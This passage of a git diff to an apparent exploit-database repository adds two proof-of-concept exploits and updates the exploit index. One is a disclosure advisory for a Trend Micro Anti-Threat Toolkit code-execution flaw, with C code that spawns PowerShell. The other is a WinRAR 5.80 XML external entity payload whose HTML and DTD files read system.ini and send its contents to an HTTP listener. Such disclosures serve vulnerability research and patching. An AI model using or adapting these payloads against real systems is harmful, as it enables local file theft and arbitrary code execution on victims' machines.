+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47528.zip
\ No newline at end of file
diff --git a/exploits/windows/local/47527.txt b/exploits/windows/local/47527.txt
new file mode 100644
index 000000000..b259c12f0
--- /dev/null
+++ b/exploits/windows/local/47527.txt
@@ -0,0 +1,112 @@
+# Exploit Title: Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution
+# Date: 2019-10-19
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: www.trendmicro.com
+# Version: 1.62.0.1218 and below
+# Tested on: Microsoft Windows
+# CVE: N/A
+
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt
+[+] ISR: Apparition Security          
+ 
+
+[Vendor]
+www.trendmicro.com
+
+
+[Product]
+Trend Micro Anti-Threat Toolkit (ATTK)
+1.62.0.1218 and below
+
+Trend Micro Anti-Threat Toolkit (ATTK) can analyze malware issues and clean infections.
+It can be used to perform system forensic scans and clean the following infection types:
+
+General malware infection
+Master boot record Infection
+CIDOX/ RODNIX infection
+Rootkit infection
+Zbot infection
+Cryptolocker infection
+etc..
+
+
+[Vulnerability Type]
+Remote Code Execution
+
+
+[CVE Reference]
+CVE-2019-9491
+
+
+[Security Issue]
+Trend Micro Anti-Threat Toolkit (ATTK) will load and execute arbitrary .EXE files if a malware author
+happens to use the vulnerable naming convention of "cmd.exe" or "regedit.exe" and the malware can be
+placed in the vacinity of the ATTK when a scan is launched by the end user.
+
+Since the ATTK is signed by verified publisher and therefore assumed trusted any MOTW security warnings
+are bypassed if the malware was internet downloaded, also it can become a persistence mechanism as
+each time the Anti-Threat Toolkit is run so can an attackers malware.
+
+Standalone affected components of ATTK and other integrations (e.g. WCRY Patch Tool, OfficeScan Toolbox, etc.)
+
+attk_collector_cli_x64.exe 
+Hash: e8503e9897fd56eac0ce3c3f6db24fb1
+
+TrendMicroRansomwareCollector64.r09.exe
+Hash: 798039027bb4363dcfd264c14267375f
+
+attk_ScanCleanOnline_gui_x64.exe
+Hash: f1d2ca4b14368911c767873cdbc194ed
+
+
+[References]
+https://success.trendmicro.com/solution/000149878
+*All versions of the ATTK have been updated with the newer version. Anti-Threat Toolkit (ATTK) 1.62.0.1223
+
+
+[Exploit/POC]
+Compile an .EXE using below "C" code and use naming convention of "cmd.exe" or "regedit.exe".
+Run the Anti-Threat Toolkit and watch the ATTK console to see the Trojan file get loaded and executed.
+
+#include <windows.h>
+
+void main(void){
+   puts("Trend Micro Anti-Threat Toolkit PWNED!");
+   puts("Discovery: hyp3rlinx");
+   puts("CVE-2019-9491\n");
+   WinExec("powershell", 0);
+}
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=HBrRVe8WCHs
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: September 9, 2019
+Vendor confirms vulnerability: September 25, 2019
+Vendor requests to coordinate advisory: September 25, 2019
+October 19, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/xml/local/47526.txt b/exploits/xml/local/47526.txt
new file mode 100644
index 000000000..af8eea29a
--- /dev/null
+++ b/exploits/xml/local/47526.txt
@@ -0,0 +1,38 @@
+# Exploit Title: winrar 5.80 - XML External Entity Injection
+# Exploit Author: albalawi
+# Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
+# Version: 5.80
+# Tested on: Microsoft Windows Version 10.0.18362.418 64bit
+
+# POC
+
+1- python -m SimpleHTTPServer (listens Port 8000)
+2- open winrar or any file.rar
+3- help
+4- help topics
+5- Drag the exploit to the window
+
+
+html file
+
+<htmlL>
+<body>
+<xml>
+<?xml version="1.0"?>
+<!DOCTYPE flavios [ 
+<!ENTITY % file SYSTEM "C:\Windows\system.ini">
+<!ENTITY % dtd SYSTEM "http://127.0.0.1:8800/start.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+</xml>
+</body>
+</html>
+
+
+
+==============================
+start.dtd
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8800?%file;'>">
+%all;
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e47939e03..6a627cf98 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6579,6 +6579,8 @@ id,file,description,date,author,type,platform,port
 47489,exploits/windows/dos/47489.txt,"Windows Kernel - Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
 47494,exploits/windows/dos/47494.py,"SpotAuditor 5.3.1.0 - Denial of Service",2019-10-14,"Sanjana shetty",dos,windows,
 47495,exploits/windows/dos/47495.py,"ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service",2019-10-14,stresser,dos,windows,
+47525,exploits/windows/dos/47525.txt,"winrar 5.80 64bit - Denial of Service",2019-10-21,alblalawi,dos,windows,
+47528,exploits/windows/dos/47528.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)",2019-10-21,"Google Security Research",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10716,7 +10718,7 @@ id,file,description,date,author,type,platform,port
 47482,exploits/linux/local/47482.rb,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (Metasploit_ DEP Bypass)",2019-10-10,max7253,local,linux,
 47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows,
 47493,exploits/windows/local/47493.txt,"Uplay 92.0.0.6280 - Local Privilege Escalation",2019-10-14,"Kusol Watchara-Apanukorn",local,windows,
-47502,exploits/linux/local/47502.py,"sudo 1.2.27 - Security Bypass",2019-10-15,"Mohin Paramasivam",local,linux,
+47502,exploits/linux/local/47502.py,"sudo 1.8.27 - Security Bypass",2019-10-15,"Mohin Paramasivam",local,linux,
 47503,exploits/windows/local/47503.txt,"ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path",2019-10-15,cakes,local,windows,
 47504,exploits/windows/local/47504.txt,"Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path",2019-10-16,"Luis MedinaL",local,windows,
 47506,exploits/windows/local/47506.txt,"Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path",2019-10-16,cakes,local,windows,
@@ -10727,6 +10729,9 @@ id,file,description,date,author,type,platform,port
 47521,exploits/windows/local/47521.txt,"BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path",2019-10-17,"Debashis Pal",local,windows,
 47522,exploits/windows/local/47522.txt,"Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path",2019-10-17,"Debashis Pal",local,windows,
 47523,exploits/windows/local/47523.txt,"WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path",2019-10-17,cakes,local,windows,
+47526,exploits/xml/local/47526.txt,"winrar 5.80 - XML External Entity Injection",2019-10-21,alblalawi,local,xml,
+47527,exploits/windows/local/47527.txt,"Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution",2019-10-21,hyp3rlinx,local,windows,
+47529,exploits/solaris/local/47529.txt,"Solaris 11.4 - xscreensaver Privilege Escalation",2019-10-21,"Marco Ivaldi",local,solaris,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41844,7 +41849,6 @@ id,file,description,date,author,type,platform,port
 47498,exploits/php/webapps/47498.txt,"Kirona-DRS 5.5.3.5 - Information Disclosure",2019-10-14,Ramikan,webapps,php,
 47501,exploits/php/webapps/47501.txt,"Bolt CMS 3.6.10 - Cross-Site Request Forgery",2019-10-15,r3m0t3nu11,webapps,php,
 47505,exploits/php/webapps/47505.txt,"Accounts Accounting 7.02 - Persistent Cross-Site Scripting",2019-10-16,"Debashis Pal",webapps,php,
-47512,exploits/linux/webapps/47512.txt,"CyberArk Password Vault 10.6 - Authentication Bypass",2019-10-16,"Daniel Martinez Adan",webapps,linux,
 47516,exploits/php/webapps/47516.txt,"Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
 47517,exploits/php/webapps/47517.txt,"Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
 47518,exploits/php/webapps/47518.txt,"Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,